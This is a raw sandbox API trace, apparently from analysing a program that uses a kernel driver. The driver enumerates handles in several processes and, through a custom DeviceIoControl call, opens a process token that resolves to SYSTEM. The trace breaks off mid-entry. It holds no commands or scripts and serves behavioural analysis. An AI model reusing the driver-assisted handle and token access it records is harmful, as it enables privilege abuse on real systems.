[0289.393] PsReleaseProcessExitSynchronization () returned 0x2 [0289.393] ObfDereferenceObject (Object=0xffffe00067eea080) returned 0x5fff3 [0289.393] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.393] ObfDereferenceObject (Object=0xffffe00067e9e090) returned 0x7ffe [0289.393] IoCompleteRequest () returned 0x0 [0289.393] PsLookupProcessByProcessId (in: ProcessId=0x1cc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.393] PsAcquireProcessExitSynchronization () returned 0x0 [0289.393] KeStackAttachProcess (in: PROCESS=0xffffe00067eea080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eea080, ApcState=0xffffd000ac0cf400) [0289.393] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069712860, HandleInformation=0x0) returned 0x0 [0289.393] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.393] PsReleaseProcessExitSynchronization () returned 0x2 [0289.393] ObfDereferenceObject (Object=0xffffe00067eea080) returned 0x5fff2 [0289.393] ObQueryNameString (in: Object=0xffffe00069712860, ObjectNameInfo=0xffffe0006a3e57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3e57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.393] ObfDereferenceObject (Object=0xffffe00069712860) returned 0x7ffe [0289.393] IoCompleteRequest () returned 0x0 [0289.393] PsLookupProcessByProcessId (in: ProcessId=0x1cc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.394] PsAcquireProcessExitSynchronization () returned 0x0 [0289.394] KeStackAttachProcess (in: PROCESS=0xffffe00067eea080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eea080, ApcState=0xffffd000ac0cf400) [0289.394] ObReferenceObjectByHandle (in: Handle=0x18c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006c56f360, HandleInformation=0x0) returned 0x0 [0289.394] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.394] PsReleaseProcessExitSynchronization () returned 0x2 [0289.394] ObfDereferenceObject (Object=0xffffe00067eea080) returned 0x5fff1 [0289.394] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a2a0044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2a0044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.394] ObfDereferenceObject (Object=0xffffe0006c56f360) returned 0x7ffe [0289.394] IoCompleteRequest () returned 0x0 [0289.394] PsLookupProcessByProcessId (in: ProcessId=0x1cc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.394] PsAcquireProcessExitSynchronization () returned 0x0 [0289.394] KeStackAttachProcess (in: PROCESS=0xffffe00067eea080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eea080, ApcState=0xffffd000ac0cf400) [0289.394] ObReferenceObjectByHandle (in: Handle=0x190, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000745dade0, HandleInformation=0x0) returned 0x0 [0289.394] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.394] PsReleaseProcessExitSynchronization () returned 0x2 [0289.394] ObfDereferenceObject (Object=0xffffe00067eea080) returned 0x5fff0 [0289.394] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.394] ObfDereferenceObject (Object=0xffffe000745dade0) returned 0x7ffe [0289.394] IoCompleteRequest () returned 0x0 [0289.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0289.394] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.394] PsAcquireProcessExitSynchronization () returned 0x0 [0289.394] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400) [0289.394] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067efbb40, HandleInformation=0x0) returned 0x0 [0289.394] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.394] PsReleaseProcessExitSynchronization () returned 0x2 [0289.394] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48168 [0289.394] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2c5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2c5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.394] ObfDereferenceObject (Object=0xffffe00067efbb40) returned 0x7ffe [0289.394] IoCompleteRequest () returned 0x0 [0289.394] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.394] PsAcquireProcessExitSynchronization () returned 0x0 [0289.394] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400) [0289.394] ObReferenceObjectByHandle (in: Handle=0xe4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697a3580, HandleInformation=0x0) returned 0x0 [0289.394] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.394] PsReleaseProcessExitSynchronization () returned 0x2 [0289.394] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48167 [0289.394] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.394] ObfDereferenceObject (Object=0xffffe000697a3580) returned 0x7fff [0289.394] IoCompleteRequest () returned 0x0 [0289.394] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.394] PsAcquireProcessExitSynchronization () returned 0x0 [0289.394] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400) [0289.394] ObReferenceObjectByHandle (in: Handle=0xe8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697a3410, HandleInformation=0x0) returned 0x0 [0289.395] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.395] PsReleaseProcessExitSynchronization () returned 0x2 [0289.395] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48166 [0289.395] ObQueryNameString (in: Object=0xffffe000697a3410, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.395] ObfDereferenceObject (Object=0xffffe000697a3410) returned 0x7ffd [0289.395] IoCompleteRequest () returned 0x0 [0289.395] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.395] PsAcquireProcessExitSynchronization () returned 0x0 [0289.395] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400) [0289.395] ObReferenceObjectByHandle (in: Handle=0xec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697a32a0, HandleInformation=0x0) returned 0x0 [0289.395] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.395] PsReleaseProcessExitSynchronization () returned 0x2 [0289.395] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48165 [0289.395] ObQueryNameString (in: Object=0xffffe000697a32a0, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.395] ObfDereferenceObject (Object=0xffffe000697a32a0) returned 0x7ffd [0289.395] IoCompleteRequest () returned 0x0 [0289.395] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.395] PsAcquireProcessExitSynchronization () returned 0x0 [0289.395] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400) [0289.395] ObReferenceObjectByHandle (in: Handle=0x110, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697a5f20, HandleInformation=0x0) returned 0x0 [0289.395] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.395] PsReleaseProcessExitSynchronization () returned 0x2 [0289.395] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48164 [0289.395] ObQueryNameString (in: Object=0xffffe000697a5f20, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.395] ObfDereferenceObject (Object=0xffffe000697a5f20) returned 0x7ff1 [0289.395] IoCompleteRequest () returned 0x0 [0289.395] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.395] PsAcquireProcessExitSynchronization () returned 0x0 [0289.395] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400) [0289.395] ObReferenceObjectByHandle (in: Handle=0x118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697a57a0, HandleInformation=0x0) returned 0x0 [0289.395] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.395] PsReleaseProcessExitSynchronization () returned 0x2 [0289.395] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48163 [0289.395] ObQueryNameString (in: Object=0xffffe000697a57a0, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.395] ObfDereferenceObject (Object=0xffffe000697a57a0) returned 0x7ffd [0289.395] IoCompleteRequest () returned 0x0 [0289.395] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.395] PsAcquireProcessExitSynchronization () returned 0x0 [0289.395] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400) [0289.395] ObReferenceObjectByHandle (in: Handle=0x11c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697a5910, HandleInformation=0x0) returned 0x0 [0289.395] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.395] PsReleaseProcessExitSynchronization () returned 0x2 [0289.395] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48162 [0289.395] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.395] ObfDereferenceObject (Object=0xffffe000697a5910) returned 0x7fff [0289.396] IoCompleteRequest () returned 0x0 [0289.396] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.396] PsAcquireProcessExitSynchronization () returned 0x0 [0289.396] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400) [0289.396] ObReferenceObjectByHandle (in: Handle=0x120, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697a5630, HandleInformation=0x0) returned 0x0 [0289.396] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.396] PsReleaseProcessExitSynchronization () returned 0x2 [0289.396] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48161 [0289.396] ObQueryNameString (in: Object=0xffffe000697a5630, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.396] ObfDereferenceObject (Object=0xffffe000697a5630) returned 0x7ffd [0289.396] IoCompleteRequest () returned 0x0 [0289.396] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.396] PsAcquireProcessExitSynchronization () returned 0x0 [0289.396] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400) [0289.396] ObReferenceObjectByHandle (in: Handle=0x134, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697ad610, HandleInformation=0x0) returned 0x0 [0289.396] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.396] PsReleaseProcessExitSynchronization () returned 0x2 [0289.396] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x48160 [0289.396] ObQueryNameString (in: Object=0xffffe000697ad610, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.396] ObfDereferenceObject (Object=0xffffe000697ad610) returned 0x800e [0289.396] IoCompleteRequest () returned 0x0 [0289.396] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.396] PsAcquireProcessExitSynchronization () returned 0x0 [0289.396] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400) [0289.396] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697ace40, HandleInformation=0x0) returned 0x0 [0289.396] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.396] PsReleaseProcessExitSynchronization () returned 0x2 [0289.396] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x4815f [0289.396] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.396] ObfDereferenceObject (Object=0xffffe000697ace40) returned 0x7ffb [0289.396] IoCompleteRequest () returned 0x0 [0289.396] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.396] PsAcquireProcessExitSynchronization () returned 0x0 [0289.396] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400) [0289.396] ObReferenceObjectByHandle (in: Handle=0x2f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bc1590, HandleInformation=0x0) returned 0x0 [0289.396] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.396] PsReleaseProcessExitSynchronization () returned 0x2 [0289.396] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x4815e [0289.396] ObQueryNameString (in: Object=0xffffe00069bc1590, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.396] ObfDereferenceObject (Object=0xffffe00069bc1590) returned 0x7ffd [0289.396] IoCompleteRequest () returned 0x0 [0289.396] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.396] PsAcquireProcessExitSynchronization () returned 0x0 [0289.397] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400) [0289.397] ObReferenceObjectByHandle (in: Handle=0x318, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bbe090, HandleInformation=0x0) returned 0x0 [0289.397] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.397] PsReleaseProcessExitSynchronization () returned 0x2 [0289.397] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x4815d [0289.397] ObQueryNameString (in: Object=0xffffe00069bbe090, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.397] ObfDereferenceObject (Object=0xffffe00069bbe090) returned 0x7ff4 [0289.397] IoCompleteRequest () returned 0x0 [0289.397] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.397] PsAcquireProcessExitSynchronization () returned 0x0 [0289.397] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400) [0289.397] ObReferenceObjectByHandle (in: Handle=0x330, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698ca920, HandleInformation=0x0) returned 0x0 [0289.397] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.397] PsReleaseProcessExitSynchronization () returned 0x2 [0289.397] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x4815c [0289.397] ObQueryNameString (in: Object=0xffffe000698ca920, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.397] ObfDereferenceObject (Object=0xffffe000698ca920) returned 0x7ff2 [0289.397] IoCompleteRequest () returned 0x0 [0289.397] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.397] PsAcquireProcessExitSynchronization () returned 0x0 [0289.397] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400) [0289.397] ObReferenceObjectByHandle (in: Handle=0x334, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bc4920, HandleInformation=0x0) returned 0x0 [0289.397] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.397] PsReleaseProcessExitSynchronization () returned 0x2 [0289.397] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x4815b [0289.397] ObQueryNameString (in: Object=0xffffe00069bc4920, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.397] ObfDereferenceObject (Object=0xffffe00069bc4920) returned 0x7ffd [0289.397] IoCompleteRequest () returned 0x0 [0289.397] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.397] PsAcquireProcessExitSynchronization () returned 0x0 [0289.397] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000ac0cf400) [0289.397] ObReferenceObjectByHandle (in: Handle=0x348, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bc4f20, HandleInformation=0x0) returned 0x0 [0289.397] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.397] PsReleaseProcessExitSynchronization () returned 0x2 [0289.397] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x4815a [0289.397] ObQueryNameString (in: Object=0xffffe00069bc4f20, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.397] ObfDereferenceObject (Object=0xffffe00069bc4f20) returned 0x7ffd [0289.397] IoCompleteRequest () returned 0x0 [0289.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x188 [0289.397] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0289.397] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00067eca080, HandleInformation=0x0) returned 0x0 [0289.397] ObOpenObjectByPointer (in: Object=0xffffe00067eca080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0289.398] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x67d22 [0289.398] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe0006a765c80 | out: TokenHandle=0xffffe0006a765c80*=0x18c) returned 0x0 [0289.398] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0289.398] IoCompleteRequest () returned 0x0 [0289.398] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0289.398] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0289.399] CloseHandle (hObject=0x18c) returned 1 [0289.399] CloseHandle (hObject=0x188) returned 1 [0289.399] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.399] PsAcquireProcessExitSynchronization () returned 0x0 [0289.399] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.399] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067edead0, HandleInformation=0x0) returned 0x0 [0289.399] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.399] PsReleaseProcessExitSynchronization () returned 0x2 [0289.399] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd20 [0289.399] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.399] ObfDereferenceObject (Object=0xffffe00067edead0) returned 0x7ffe [0289.399] IoCompleteRequest () returned 0x0 [0289.399] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.399] PsAcquireProcessExitSynchronization () returned 0x0 [0289.399] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.399] ObReferenceObjectByHandle (in: Handle=0x84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069585e70, HandleInformation=0x0) returned 0x0 [0289.399] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.399] PsReleaseProcessExitSynchronization () returned 0x2 [0289.399] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd1f [0289.399] ObQueryNameString (in: Object=0xffffe00069585e70, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.399] ObfDereferenceObject (Object=0xffffe00069585e70) returned 0x7fff [0289.399] IoCompleteRequest () returned 0x0 [0289.399] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.399] PsAcquireProcessExitSynchronization () returned 0x0 [0289.399] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.399] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067e98a40, HandleInformation=0x0) returned 0x0 [0289.399] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.399] PsReleaseProcessExitSynchronization () returned 0x2 [0289.399] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd1e [0289.399] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.399] ObfDereferenceObject (Object=0xffffe00067e98a40) returned 